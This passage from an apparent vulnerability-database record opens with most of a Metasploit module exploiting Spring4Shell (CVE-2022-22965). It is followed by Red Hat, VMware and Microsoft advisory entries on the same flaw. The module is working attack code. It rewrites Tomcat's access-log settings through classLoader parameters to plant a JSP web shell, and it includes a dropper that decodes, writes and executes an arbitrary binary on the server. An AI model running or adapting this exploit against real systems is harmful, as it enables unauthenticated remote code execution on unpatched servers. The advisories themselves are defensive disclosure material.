Msf::Exploit::FileDropper \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Spring Framework Class property RCE (Spring4Shell)', \n'Description' => %q{ \nSpring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above \nand specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable \nto remote code execution due to an unsafe data binding used to populate an object from request parameters \nto set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the \norg.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following: \nclass.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can \ngain remote code execution. \n}, \n'Author' => [ \n'vleminator <vleminator[at]gmail.com>' \n], \n'License' => MSF_LICENSE, \n'References' => [ \n['CVE', '2022-22965'], \n['URL', 'https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement'], \n['URL', 'https://github.com/spring-projects/spring-framework/issues/28261'], \n['URL', 'https://tanzu.vmware.com/security/cve-2022-22965'] \n], \n'Platform' => %w[linux win], \n'Payload' => { \n'Space' => 5000, \n'DisableNops' => true \n}, \n'Targets' => [ \n[ \n'Java', \n{ \n'Arch' => ARCH_JAVA, \n'Platform' => %w[linux win] \n}, \n], \n[ \n'Linux', \n{ \n'Arch' => [ARCH_X86, ARCH_X64], \n'Platform' => 'linux' \n} \n], \n[ \n'Windows', \n{ \n'Arch' => [ARCH_X86, ARCH_X64], \n'Platform' => 'win' \n} \n] \n], \n'DisclosureDate' => '2022-03-31', \n'DefaultTarget' => 0, \n'Notes' => { \n'AKA' => ['Spring4Shell', 'SpringShell'], \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [ true, 'The path to the 
application action', '/app/example/HelloWorld.action']), \nOptString.new('PAYLOAD_PATH', [true, 'Path to write the payload', 'webapps/ROOT']), \nOptEnum.new('HTTP_METHOD', [false, 'HTTP method to use', 'Automatic', ['Automatic', 'GET', 'POST']]), \n] \n) \nregister_advanced_options [ \nOptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) \n] \nend \n \ndef jsp_dropper(file, exe) \n# The sun.misc.BASE64Decoder.decodeBuffer API is no longer available in Java 9. \ndropper = <<~EOS \n<%@ page import=\\\"java.io.FileOutputStream\\\" %> \n<%@ page import=\\\"java.util.Base64\\\" %> \n<%@ page import=\\\"java.io.File\\\" %> \n<% \nFileOutputStream oFile = new FileOutputStream(\\\"#{file}\\\", false); \noFile.write(Base64.getDecoder().decode(\\\"#{Rex::Text.encode_base64(exe)}\\\")); \noFile.flush(); \noFile.close(); \nFile f = new File(\\\"#{file}\\\"); \nf.setExecutable(true); \nRuntime.getRuntime().exec(\\\"#{file}\\\"); \n%> \nEOS \n \ndropper \nend \n \ndef modify_class_loader(method, opts) \ncl_prefix = 'class.module.classLoader' \n \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path.to_s), \n'version' => '1.1', \n'method' => method, \n'headers' => { \n'c1' => '<%', # %{c1}i replacement in payload \n'c2' => '%>' # %{c2}i replacement in payload \n}, \n\"vars_#{method == 'GET' ? 
'get' : 'post'}\" => { \n\"#{cl_prefix}.resources.context.parent.pipeline.first.pattern\" => opts[:payload], \n\"#{cl_prefix}.resources.context.parent.pipeline.first.directory\" => opts[:directory], \n\"#{cl_prefix}.resources.context.parent.pipeline.first.prefix\" => opts[:prefix], \n\"#{cl_prefix}.resources.context.parent.pipeline.first.suffix\" => opts[:suffix], \n\"#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat\" => opts[:file_date_format] \n} \n}) \nend \n \ndef check_log_file \nprint_status(\"#{peer} - Waiting for the server to flush the logfile\") \nprint_status(\"#{peer} - Executing JSP payload at #{full_uri(@jsp_file)}\") \n \nsucceeded = retry_until_true(timeout: 60) do \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(@jsp_file) \n}) \n \nres&.code == 200 && !res.body.blank? \nend \n \nfail_with(Failure::UnexpectedReply, \"Seems the payload hasn't been written\") unless succeeded \n \nprint_good(\"#{peer} - Log file flushed\") \nend \n \n# Fix the JSP payload to make it valid once is dropped \n# to the log file \ndef fix(jsp) \noutput = '' \njsp.each_line do |l| \nif l =~ /<%.*%>/ \noutput << l \nelsif l =~ /<%/ \nnext \nelsif l =~ /%>/ \nnext \nelsif l.chomp.empty? 
\nnext \nelse \noutput << \"<% #{l.chomp} %>\" \nend \nend \noutput \nend \n \ndef create_jsp \njsp = <<~EOS \n<% \nFile jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + \"#{@jsp_file}\"); \njsp.delete(); \n%> \n#{Faker::Internet.uuid} \nEOS \nif target['Arch'] == ARCH_JAVA \njsp << fix(payload.encoded) \nelse \npayload_exe = generate_payload_exe \npayload_filename = rand_text_alphanumeric(rand(4..7)) \n \nif target['Platform'] == 'win' \npayload_path = datastore['WritableDir'] + '\\\\' + payload_filename \nelse \npayload_path = datastore['WritableDir'] + '/' + payload_filename \nend \n \njsp << jsp_dropper(payload_path, payload_exe) \nregister_files_for_cleanup(payload_path) \nend \n \njsp \nend \n \ndef check \n@checkcode = _check \nend \n \ndef _check \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(Rex::Text.rand_text_alpha_lower(4..6)) \n) \n \nreturn CheckCode::Unknown('Web server seems unresponsive') unless res \n \nif res.headers.key?('Server') \nres.headers['Server'].match(%r{(.*)/([\\d|.]+)$}) \nelse \nres.body.match(%r{Apache\\s(.*)/([\\d|.]+)}) \nend \n \nserver = Regexp.last_match(1) || nil \nversion = Rex::Version.new(Regexp.last_match(2)) || nil \n \nreturn Exploit::CheckCode::Safe('Application does not seem to be running under Tomcat') unless server && server.match(/Tomcat/) \n \nvprint_status(\"Detected #{server} #{version} running\") \n \nif datastore['HTTP_METHOD'] == 'Automatic' \n# prefer POST over get to keep the vars out of the query string if possible \nmethods = %w[POST GET] \nelse \nmethods = [ datastore['HTTP_METHOD'] ] \nend \n \nmethods.each do |method| \nvars = \"vars_#{method == 'GET' ? 
'get' : 'post'}\" \nres = send_request_cgi( \n'method' => method, \n'uri' => normalize_uri(datastore['TARGETURI']), \nvars => { 'class.module.classLoader.DefaultAssertionStatus' => Rex::Text.rand_text_alpha_lower(4..6) } \n) \n \n# setting the default assertion status to a valid status \nsend_request_cgi( \n'method' => method, \n'uri' => normalize_uri(datastore['TARGETURI']), \nvars => { 'class.module.classLoader.DefaultAssertionStatus' => 'true' } \n) \nreturn Exploit::CheckCode::Appears(details: { method: method }) if res.code == 400 \nend \n \nExploit::CheckCode::Safe \nend \n \ndef exploit \nprefix_jsp = rand_text_alphanumeric(rand(3..5)) \ndate_format = rand_text_numeric(rand(1..4)) \n@jsp_file = prefix_jsp + date_format + '.jsp' \nhttp_method = datastore['HTTP_METHOD'] \nif http_method == 'Automatic' \n# if the check was skipped but we need to automatically identify the method, we have to run it here \n@checkcode = check if @checkcode.nil? \nhttp_method = @checkcode.details[:method] \nfail_with(Failure::BadConfig, 'Failed to automatically identify the HTTP method') if http_method.blank? 
\n \nprint_good(\"Automatically identified HTTP method: #{http_method}\") \nend \n \n# if the check method ran automatically, add a short delay before continuing with exploitation \nsleep(5) if @checkcode \n \n# Prepare the JSP \nprint_status(\"#{peer} - Generating JSP...\") \n \n# rubocop:disable Style/FormatStringToken \njsp = create_jsp.gsub('<%', '%{c1}i').gsub('%>', '%{c2}i') \n# rubocop:enable Style/FormatStringToken \n \n# Modify the Class Loader \nprint_status(\"#{peer} - Modifying Class Loader...\") \nproperties = { \npayload: jsp, \ndirectory: datastore['PAYLOAD_PATH'], \nprefix: prefix_jsp, \nsuffix: '.jsp', \nfile_date_format: date_format \n} \nres = modify_class_loader(http_method, properties) \nunless res \nfail_with(Failure::TimeoutExpired, \"#{peer} - No answer\") \nend \n \n# No matter what happened, try to 'restore' the Class Loader \nproperties = { \npayload: '', \ndirectory: '', \nprefix: '', \nsuffix: '', \nfile_date_format: '' \n} \n \nmodify_class_loader(http_method, properties) \n \ncheck_log_file \n \nhandler \nend \n \n# Retry the block until it returns a truthy value. Each iteration attempt will \n# be performed with expoential backoff. If the timeout period surpasses, false is returned. \ndef retry_until_true(timeout:) \nstart_time = Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) \nending_time = start_time + timeout \nretry_count = 0 \nwhile Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) < ending_time \nresult = yield \nreturn result if result \n \nretry_count += 1 \nremaining_time_budget = ending_time - Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) \nbreak if remaining_time_budget <= 0 \n \ndelay = 2**retry_count \nif delay >= remaining_time_budget \ndelay = remaining_time_budget \nvprint_status(\"Final attempt. 
Sleeping for the remaining #{delay} seconds out of total timeout #{timeout}\") \nelse \nvprint_status(\"Sleeping for #{delay} seconds before attempting again\") \nend \n \nsleep delay \nend \n \nfalse \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/167011/spring_framework_rce_spring4shell.rb.txt"}], "redhatcve": [{"lastseen": "2023-12-03T20:43:29", "description": "A flaw was found in Spring Framework, specifically within two modules called Spring MVC and Spring WebFlux, (transitively affected from Spring Beans), using parameter data binding. This flaw allows an attacker to pass specially-constructed malicious requests to certain parameters and possibly gain access to normally-restricted functionality within the Java Virtual Machine.\n#### Mitigation\n\nFor those who are not able to upgrade affected Spring classes to the fixed versions, there is a workaround customers can implement for their applications, via setting disallowed fields on the data binder, and denying various iterations of the string "class.*" \n\n\nFor full implementation details, see Spring's early announcement post in the "suggested workarounds" section: <https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement#suggested-workarounds> \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T18:32:57", "type": "redhatcve", "title": "CVE-2022-22965", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-11-11T07:03:52", "id": "RH:CVE-2022-22965", "href": "https://access.redhat.com/security/cve/cve-2022-22965", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-13T03:14:07", "description": "A flaw was found in Spring Cloud Function via the spring.cloud.function.routing-expression header that is modified by the attacker to contain malicious expression language code. The attacker is able to call functions that should not normally be accessible, including runtime exec calls.\n#### Mitigation\n\nAffected customers should update immediately as soon as patched software is available. There are no other mitigations available at this time. 
\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T18:32:29", "type": "redhatcve", "title": "CVE-2022-22963", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2023-10-13T01:34:03", "id": "RH:CVE-2022-22963", "href": "https://access.redhat.com/security/cve/cve-2022-22963", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "vmware": [{"lastseen": "2023-12-03T16:01:37", "description": "3\\. 
Problem Description \n\nMultiple products impacted by remote code execution vulnerability (CVE-2022-22965).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T00:00:00", "type": "vmware", "title": "VMware Response to Spring Framework Remote Code Execution Vulnerability (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-30T00:00:00", "id": "VMSA-2022-0010.5", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0010.5.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-04T08:32:24", "description": "**IMPORTANT See the Notes section if prior to April 6, 3 PM PST you have updated TAS or Ops Manager or you have applied workarounds to TAS, Ops Manager or TKGi.**\n\n##### **1\\. Impacted Products**\n\n * VMware Tanzu Application Service for VMs (TAS) \n\n * VMware Tanzu Operations Manager (Ops Manager) \n\n * VMware Tanzu Kubernetes Grid Integrated Edition (TKGI)\n\n##### **2\\. 
Introduction**\n\nA critical vulnerability in Spring Framework project identified by CVE-2022-22965 has been publicly disclosed which impacts VMware products. \n\n\n##### **3\\. Problem Description**\n\n**Description**\n\nMultiple products impacted by remote code execution vulnerability (CVE-2022-22965).\n\n**Known Attack Vectors**\n\nA malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system.\n\n**Resolution**\n\nFixes for CVE-2022-22965 are documented in the 'Fixed Version' column of the 'Response Matrix' below.\n\n**Workarounds**\n\nWorkarounds for CVE-2022-22965 are documented in the 'Workarounds' column of the 'Response Matrix' below.\n\n**Additional Documentation**\n\nNone.\n\n**Notes**\n\n * **2022-04-04:** At the time of this publication, VMware has reviewed its product portfolio and found that the products listed in this advisory are affected. VMware continues to investigate this vulnerability, and will update the advisory should any changes evolve.\n * **2022-04-06:** VMware is aware of reports that exploitation of CVE-2022-22965 has occurred in the wild. \n**2022-04-06:** Customers that have applied the workaround for TAS, Ops Manager, or TKGI prior to April 6, 3 PM PST will need to reapply the workaround. The new workaround instructions now use UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to TAS 2.10.29, 2.11.17, 2.12.10 or 2.13.1 will need to update to the TAS versions listed in this advisory. 
The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 are advised to deploy the workaround as no version for Ops Manager is yet available that addresses CVE-2022-22965.\n * **2022-04-07:** \nCustomers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 will need to update to the Ops Manager versions listed in this advisory. The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-08:** Investigations have concluded, and the list of affected VMware products contained in the 'Response Matrix' below is complete.\n\n**Acknowledgements**\n\nNone.\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T00:00:00", "type": "vmware", "title": "VMware Response to Spring Framework Remote Code Execution Vulnerability (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-07T00:00:00", "id": "VMSA-2022-0010.3", "href": 
"https://www.vmware.com/security/advisories/VMSA-2022-0010.3.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-14T16:19:16", "description": "**IMPORTANT See the Notes section if prior to April 6, 3 PM PST you have updated TAS or Ops Manager or you have applied workarounds to TAS, Ops Manager or TKGi.**\n\n##### **1\\. Impacted Products**\n\n * VMware Tanzu Application Service for VMs (TAS) \n\n * VMware Tanzu Operations Manager (Ops Manager) \n\n * VMware Tanzu Kubernetes Grid Integrated Edition (TKGI)\n\n##### **2\\. Introduction**\n\nA critical vulnerability in Spring Framework project identified by CVE-2022-22965 has been publicly disclosed which impacts VMware products. \n\n\n##### **3\\. Problem Description**\n\n**Description**\n\nMultiple products impacted by remote code execution vulnerability (CVE-2022-22965).\n\n**Known Attack Vectors**\n\nA malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system.\n\n**Resolution**\n\nFixes for CVE-2022-22965 are documented in the 'Fixed Version' column of the 'Response Matrix' below.\n\n**Workarounds**\n\nWorkarounds for CVE-2022-22965 are documented in the 'Workarounds' column of the 'Response Matrix' below.\n\n**Additional Documentation**\n\nNone.\n\n**Notes**\n\n * **2022-04-04:** At the time of this publication, VMware has reviewed its product portfolio and found that the products listed in this advisory are affected. VMware continues to investigate this vulnerability, and will update the advisory should any changes evolve.\n * **2022-04-06:** VMware is aware of reports that exploitation of CVE-2022-22965 has occurred in the wild. \n**2022-04-06:** Customers that have applied the workaround for TAS, Ops Manager, or TKGI prior to April 6, 3 PM PST will need to reapply the workaround. 
The new workaround instructions now use UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to TAS 2.10.29, 2.11.17, 2.12.10 or 2.13.1 will need to update to the TAS versions listed in this advisory. The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 are advised to deploy the workaround as no version for Ops Manager is yet available that addresses CVE-2022-22965.\n * **2022-04-07:** \nCustomers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 will need to update to the Ops Manager versions listed in this advisory. The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-08:** Investigations have concluded, and the list of affected VMware products contained in the 'Response Matrix' below is complete.\n\n**Acknowledgements**\n\nNone.\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T00:00:00", "type": "vmware", "title": "VMware Response to Spring Framework Remote Code Execution Vulnerability (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-02T00:00:00", "id": "VMSA-2022-0010", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0010.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-06T21:13:59", "description": "##### **1\\. Impacted Products**\n\n * VMware Tanzu Application Service for VMs \n\n * VMware Tanzu Operations Manager\n * VMware Tanzu Kubernetes Grid Integrated Edition (TKGI)\n\n##### **2\\. Introduction**\n\nA critical vulnerability in Spring Framework project identified by CVE-2022-22965 has been publicly disclosed which impacts VMware products. \n\n\n##### **3\\. Problem Description**\n\n**Description**\n\nMultiple products impacted by remote code execution vulnerability (CVE-2022-22965).\n\n**Known Attack Vectors**\n\nA malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system.\n\n**Resolution**\n\nFixes for CVE-2022-22965 are documented in the 'Fixed Version' column of the 'Response Matrix' below.\n\n**Workarounds**\n\nWorkarounds for CVE-2022-22965 are documented in the 'Workarounds' column of the 'Response Matrix' below.\n\n**Additional Documentation**\n\nNone.\n\n**Notes**\n\n * At the time of this publication, VMware has reviewed its product portfolio and found that the products listed in this advisory are affected. 
VMware continues to investigate this vulnerability, and will update the advisory should any changes evolve.\n * VMware is aware of reports that exploitation of CVE-2022-22965 has occurred in the wild.\n\n**Acknowledgements**\n\nNone.\n\n", "cvss3": {}, "published": "2022-04-02T00:00:00", "type": "vmware", "title": "VMware Response to Spring Framework Remote Code Execution Vulnerability (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-06T00:00:00", "id": "VMSA-2022-0010.1", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0010.1.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-04-18T12:09:47", "description": "**IMPORTANT See the Notes section if prior to April 6, 3 PM PST you have updated TAS or Ops Manager or you have applied workarounds to TAS, Ops Manager or TKGi.**\n\n##### **1\\. Impacted Products**\n\n * VMware Tanzu Application Service for VMs (TAS) \n\n * VMware Tanzu Operations Manager (Ops Manager) \n\n * VMware Tanzu Kubernetes Grid Integrated Edition (TKGI)\n\n##### **2\\. Introduction**\n\nA critical vulnerability in Spring Framework project identified by CVE-2022-22965 has been publicly disclosed which impacts VMware products. \n\n\n##### **3\\. 
Problem Description**\n\n**Description**\n\nMultiple products impacted by remote code execution vulnerability (CVE-2022-22965).\n\n**Known Attack Vectors**\n\nA malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system.\n\n**Resolution**\n\nFixes for CVE-2022-22965 are documented in the 'Fixed Version' column of the 'Response Matrix' below.\n\n**Workarounds**\n\nWorkarounds for CVE-2022-22965 are documented in the 'Workarounds' column of the 'Response Matrix' below.\n\n**Additional Documentation**\n\nNone.\n\n**Notes**\n\n * **2022-04-04:** At the time of this publication, VMware has reviewed its product portfolio and found that the products listed in this advisory are affected. VMware continues to investigate this vulnerability, and will update the advisory should any changes evolve.\n * **2022-04-06:** VMware is aware of reports that exploitation of CVE-2022-22965 has occurred in the wild. \n**2022-04-06:** Customers that have applied the workaround for TAS, Ops Manager, or TKGI prior to April 6, 3 PM PST will need to reapply the workaround. The new workaround instructions now use UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to TAS 2.10.29, 2.11.17, 2.12.10 or 2.13.1 will need to update to the TAS versions listed in this advisory. The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 are advised to deploy the workaround as no version for Ops Manager is yet available that addresses CVE-2022-22965.\n * **2022-04-07:** \nCustomers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 will need to update to the Ops Manager versions listed in this advisory. 
The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-08:** Investigations have concluded, and the list of affected VMware products contained in the 'Response Matrix' below is complete.\n\n**Acknowledgements**\n\nNone.\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T00:00:00", "type": "vmware", "title": "VMware Response to Spring Framework Remote Code Execution Vulnerability (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-08T00:00:00", "id": "VMSA-2022-0010.4", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0010.4.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "msrc": [{"lastseen": "2023-12-03T15:51:43", "description": "Summary Summary Microsoft used the Spring Framework RCE, Early Announcement to inform analysis of the remote code execution vulnerability, CVE-2022-22965, disclosed on 31 Mar 2022. 
We have not to date noted any impact to the security of our enterprise services and have not experienced any degraded service availability due to this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T07:00:00", "type": "msrc", "title": "Microsoft\u2019s Response to CVE-2022-22965 Spring Framework", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T07:00:00", "id": "MSRC:6DA934C9E783C787D408548AA6F1CEC3", "href": "https://msrc.microsoft.com/blog/2022/04/microsofts-response-to-cve-2022-22965-spring-framework/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:26:47", "description": "Summary Summary Microsoft used the Spring Framework RCE, Early Announcement to inform analysis of the remote code execution vulnerability, CVE-2022-22965, disclosed on 31 Mar 2022. 
